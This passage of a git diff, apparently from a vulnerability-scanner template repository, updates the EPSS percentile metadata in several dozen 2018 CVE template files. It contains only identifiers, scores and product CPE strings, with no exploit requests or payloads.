b/http/cves/2018/CVE-2018-15745.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-15745 cwe-id: CWE-22 epss-score: 0.95386 - epss-percentile: 0.99143 + epss-percentile: 0.99144 cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index 8b3e4389a8..b43f2c0c9c 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-15917 cwe-id: CWE-79 epss-score: 0.05086 - epss-percentile: 0.92045 + epss-percentile: 0.92055 cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index 02b4ca2c52..bc485b8c63 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16059 cwe-id: CWE-22 epss-score: 0.3698 - epss-percentile: 0.96736 + epss-percentile: 0.96737 cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index 76fb8162a3..eb83449b25 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16133 cwe-id: CWE-22 epss-score: 0.05113 - epss-percentile: 0.9206 + epss-percentile: 0.92071 cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 41afa543bc..09a8aeba2b 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-16139 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48508 + epss-percentile: 0.48521 cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index c307d74251..6cf540112c 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16159 cwe-id: CWE-89 epss-score: 0.01247 - epss-percentile: 0.84016 + epss-percentile: 0.84024 cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index b4e47b8396..9cf08fd0c0 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16167 cwe-id: CWE-78 epss-score: 0.14211 - epss-percentile: 0.95092 + epss-percentile: 0.95095 cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index 549ed33993..02b9366960 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16283 cwe-id: CWE-22 epss-score: 0.10923 - epss-percentile: 0.94488 + epss-percentile: 0.94491 cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index 3c5c681bb5..10c148272f 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16299 cwe-id: CWE-22 epss-score: 0.03312 - epss-percentile: 0.90248 + epss-percentile: 0.90252 cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index 53694db87c..94452ca152 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16668 cwe-id: CWE-287 epss-score: 0.00248 - epss-percentile: 0.6249 + epss-percentile: 0.6252 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index 9f1e246080..3f75022ad3 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16670 cwe-id: CWE-287 epss-score: 0.00132 - epss-percentile: 0.47916 + epss-percentile: 0.47927 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index d5080e3f81..29d335cf32 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-16671 cwe-id: CWE-200 epss-score: 0.00251 - epss-percentile: 0.62839 + epss-percentile: 0.62867 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 008f7dc7a1..dee4a3f6ec 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-16716 cwe-id: CWE-22 epss-score: 0.00544 - epss-percentile: 0.74816 + epss-percentile: 0.74842 cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 706c6d10d8..f48c35dee2 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16761 cwe-id: CWE-601 epss-score: 0.00068 - epss-percentile: 0.28475 + epss-percentile: 0.28481 cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 801fc961b7..da5a931e88 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16763 cwe-id: CWE-74 epss-score: 0.83439 - epss-percentile: 0.98092 + epss-percentile: 0.98094 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 212e931aa3..b37319501d 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16836 cwe-id: CWE-22 epss-score: 0.29944 - epss-percentile: 0.96406 + epss-percentile: 0.96408 cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index 0f40bfb8d3..6d338c800e 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-16979 cwe-id: CWE-113 epss-score: 0.00118 - epss-percentile: 0.45631 + epss-percentile: 0.45643 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index a7395d3830..022738428f 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-17153 cwe-id: CWE-287 epss-score: 0.92144 - epss-percentile: 0.98646 + epss-percentile: 0.98647 cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 291b90836f..a4d45dd315 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-17246 cwe-id: CWE-829,CWE-73 epss-score: 0.96913 - epss-percentile: 0.99621 + epss-percentile: 0.99622 cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index ec4abdf5e8..ca3a94ac96 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2018-17254 cwe-id: CWE-89 epss-score: 0.81793 - epss-percentile: 0.98011 + epss-percentile: 0.98012 cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 8ae0fd8059..7f0962cabd 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-17422 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45631 + epss-percentile: 0.45643 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index ce492b2397..961eae2e94 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-17431 cwe-id: CWE-287 epss-score: 0.10458 - epss-percentile: 0.94377 + epss-percentile: 0.94381 cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 352e5f6042..6d5b3587eb 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-18069 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.43005 + epss-percentile: 0.43028 cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 8b5e1662f6..795055fca8 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-18264 cwe-id: CWE-306 epss-score: 0.97407 - epss-percentile: 0.99901 + epss-percentile: 0.99902 cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index be26f2ce12..bf5630357f 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-18323 cwe-id: CWE-22 epss-score: 0.97175 - epss-percentile: 0.99741 + epss-percentile: 0.9974 cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index d1c8d72243..c219a102dc 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-18570 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40499 + epss-percentile: 0.40522 cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 165fc4faf5..8c8ebf435d 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-18608 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54755 + epss-percentile: 0.54781 cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 15e91271ca..9bcc635e3a 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-18775 cwe-id: CWE-79 epss-score: 0.00223 - epss-percentile: 0.6046 + epss-percentile: 0.60491 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index 313c74dcc9..379460b663 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-18777 cwe-id: CWE-22 epss-score: 0.00224 - epss-percentile: 0.60558 + epss-percentile: 0.60589 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 3d9e5832e4..4a80069ca0 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-18809 cwe-id: CWE-22 epss-score: 0.46465 - epss-percentile: 0.97048 + epss-percentile: 0.97051 cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index a8f8c35260..8d8d465ef5 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-18925 cwe-id: CWE-384 epss-score: 0.09538 - epss-percentile: 0.94115 + epss-percentile: 0.94119 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index 9af97ad1f4..22eaa9a4fd 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-19136 cwe-id: CWE-79 epss-score: 0.00151 - epss-percentile: 0.51173 + epss-percentile: 0.512 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index e722882d79..8d10507adf 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-19137 cwe-id: CWE-79 epss-score: 0.0008 - epss-percentile: 0.33795 + epss-percentile: 0.33809 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 8cd0e1ec28..81aedf49a5 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19287 cwe-id: CWE-79 epss-score: 0.64483 - epss-percentile: 0.97514 + epss-percentile: 0.97516 cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index b0f78d22be..132353abd6 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19326 cwe-id: CWE-22 epss-score: 0.01158 - epss-percentile: 0.83312 + epss-percentile: 0.83322 cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 762a6fabde..cf56ec065c 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-19365 cwe-id: CWE-22 epss-score: 0.01612 - epss-percentile: 0.86051 + epss-percentile: 0.86055 cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index a7d9b298da..fd04c818c6 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-19386 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.58275 + epss-percentile: 0.58304 cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index 7ad19e4c10..1fc3dacff8 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-19439 cwe-id: CWE-79 epss-score: 0.01081 - epss-percentile: 0.82705 + epss-percentile: 0.82717 cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index 6647c869d4..2f079573c5 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-19458 cwe-id: CWE-287 epss-score: 0.09157 - epss-percentile: 0.93987 + epss-percentile: 0.93992 cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 42e3511d1c..be82f2736f 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-19749 cwe-id: CWE-79 epss-score: 0.00096 - epss-percentile: 0.39974 + epss-percentile: 0.39991 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index 5d1868459f..008dc83cf6 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-19751 cwe-id: CWE-79 epss-score: 0.00096 - epss-percentile: 0.39974 + epss-percentile: 0.39991 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index 3c64f471f9..816237eeef 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-19752 cwe-id: CWE-79 epss-score: 0.00096 - epss-percentile: 0.39974 + epss-percentile: 0.39991 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index ca0e34f1e5..1b656edcf7 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-19753 cwe-id: CWE-22 epss-score: 0.00881 - epss-percentile: 0.80709 + epss-percentile: 0.80723 cpe: cpe:2.3:a:oracle:tarantella_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index 7c48b248e2..8c9844c0f2 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-19877 cwe-id: CWE-79 epss-score: 0.00241 - epss-percentile: 0.61935 + epss-percentile: 0.61963 cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml index da5e6c5835..6a031d4612 100644 --- a/http/cves/2018/CVE-2018-19892.yaml +++ b/http/cves/2018/CVE-2018-19892.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-19892 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.41223 + epss-percentile: 0.41247 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 555665f074..834f502fa8 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-19914 cwe-id: CWE-79 epss-score: 0.00153 - epss-percentile: 0.51495 + epss-percentile: 0.51518 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index aabef299a8..014f55d303 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-19915 cwe-id: CWE-79 epss-score: 0.00153 - epss-percentile: 0.51495 + epss-percentile: 0.51518 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index 36219b6f25..c47fcf5793 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-20009 cwe-id: CWE-79 epss-score: 0.00153 - epss-percentile: 0.51495 + epss-percentile: 0.51518 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index cbd49da6d1..18527650a8 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-20010 cwe-id: CWE-79 epss-score: 0.00153 - epss-percentile: 0.51495 + epss-percentile: 0.51518 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml index cd684e1643..8f7903fc0a 100644 --- a/http/cves/2018/CVE-2018-20011.yaml +++ b/http/cves/2018/CVE-2018-20011.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-20011 cwe-id: CWE-79 epss-score: 0.00153 - epss-percentile: 0.51495 + epss-percentile: 0.51518 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index e038ffdf6d..c084dae21a 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-20462 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.62286 + epss-percentile: 0.62314 cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml index 65791ffbaf..8345e0cf06 100644 --- a/http/cves/2018/CVE-2018-20463.yaml +++ b/http/cves/2018/CVE-2018-20463.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-20463 cwe-id: CWE-22 epss-score: 0.01814 - epss-percentile: 0.86833 + epss-percentile: 0.86835 cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 4bef9378a2..10e5703f36 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-20470 cwe-id: CWE-22 epss-score: 0.67359 - epss-percentile: 0.97587 + epss-percentile: 0.97591 cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 2200f2cc03..b8fd3c95b2 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-20526 cwe-id: CWE-434 epss-score: 0.00794 - epss-percentile: 0.79674 + epss-percentile: 0.79685 cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20608.yaml b/http/cves/2018/CVE-2018-20608.yaml index aee2a9d6c9..2911293d6d 100644 --- a/http/cves/2018/CVE-2018-20608.yaml +++ b/http/cves/2018/CVE-2018-20608.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2018-20608 cwe-id: CWE-200 epss-score: 0.03654 - epss-percentile: 0.90655 + epss-percentile: 0.90661 cpe: cpe:2.3:a:txjia:imcat:4.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index dd7c1ca74e..64c613c5f1 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-20824 cwe-id: CWE-79 epss-score: 0.00211 - epss-percentile: 0.58861 + epss-percentile: 0.58892 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index a6b696fc01..224d6aae80 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-20985 cwe-id: CWE-20 epss-score: 0.00922 - epss-percentile: 0.81184 + epss-percentile: 0.81195 cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-2392.yaml b/http/cves/2018/CVE-2018-2392.yaml index e8d5445642..89e195fa2d 100644 --- a/http/cves/2018/CVE-2018-2392.yaml +++ b/http/cves/2018/CVE-2018-2392.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-2392 cwe-id: CWE-611 epss-score: 0.0032 - epss-percentile: 0.67306 + epss-percentile: 0.67335 cpe: cpe:2.3:a:sap:internet_graphics_server:7.20:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index 9249d99c93..f1a9231b29 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ 